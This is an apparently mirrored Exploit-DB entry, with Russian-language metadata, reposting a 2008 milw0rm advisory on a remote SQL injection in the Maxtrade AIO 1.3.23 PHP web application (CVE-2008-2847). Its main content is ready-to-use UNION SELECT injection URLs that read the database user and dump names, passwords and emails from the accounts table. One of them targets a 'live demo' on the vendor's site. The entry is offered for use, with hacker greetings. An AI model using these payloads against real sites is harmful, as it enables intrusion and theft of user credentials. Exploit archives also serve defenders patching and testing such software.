- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5853
- Проверка EDB
-
- Пройдено
- Автор
- HACKER_EGY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2847
- Дата публикации
- 2008-06-18
Код:
##########################################################
############# Remote SQL Injection Maxtrade AIO 1.3.23 ... ##############
## HaCker_Egy
## Contact : [email protected]
## Home : pal-hacker.com & atsdp.com
===============================================
# Script : Maxtrade
# Version : 1.3.23
# Download : http://softdivision.com
===============================================
# Exploit :
==>> www.target.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/*
==>> www.target.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+concat_ws(0x3a3a,name,password,email),2+from+accounts/*
# live Demo :
==>> http://softdivision.com/maxtradedemo/modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/*
===============================================================
## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , Mohamed el arab , stack
=================================================================
# milw0rm.com [2008-06-18]- Источник
- www.exploit-db.com
